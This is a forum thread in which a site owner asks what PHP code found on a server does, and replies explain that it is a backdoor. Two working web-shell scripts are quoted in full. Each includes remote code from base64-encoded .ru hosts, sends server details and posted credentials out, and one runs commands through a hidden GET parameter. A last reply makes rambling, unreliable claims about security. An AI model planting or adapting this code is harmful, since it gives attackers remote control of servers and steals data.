Jump to content

just need to know what this code does...


joecooper

Recommended Posts

can someone in detail explain what exactly this code does? thanks. i good with php but this looks complex to me!

[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>[/code]
Link to comment
Share on other sites

name
password
url


<?php
error_reporting(0);// error reporting off

if(isset($_POST["l"]) and isset($_POST["p"])){ // post name and password

if(isset($_POST["input"])){$user_auth="&l=".
base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
// post name and password encode them.


else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}//post name and password encoded


if(!isset($_POST["log_flg"])){$log_flg="&log";}
// if name and password exiat encoded


if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
// decode the name password and the url via ip


{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
//get name and password if active and post information
?>
Link to comment
Share on other sites

how about this code that was also uploaded

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
Link to comment
Share on other sites

Same type thing, but this time it sends all of your server information:
[code]
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
[/code]
to a server somewhere...if the first one fails, it goes to a second.
Link to comment
Share on other sites

once the script is on your server it can do a chmod on them just like you can.  I set up a VM and ran the script that was left on my friends server...I was able to see the entire directory structure...the hd, the cd drive, the floppy drive...I could execute command line scripts and such...I could manipulate any of the files on the server I wanted.

In his particular case there is a security hole in one of the earlier versions of the smf bridge for joomla that the hacker exploited. 
Link to comment
Share on other sites

most hackers can upload a code that is also in a photo then the code posts information back to the hacker.

The hacker is only intrested in the open ports to meachines hanging off the server for example a credit card server.

there are thousands of tolls and thosands of holes in computer programs i know for a fact that large well known companys out there have got vanable hotspots on operating systems to get into all meachines linked to the net.

in reel reality there is no such thing as secuity as were like to know it, there will always be back doors to all programs as computer developers use hackers there self for development fact.
Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.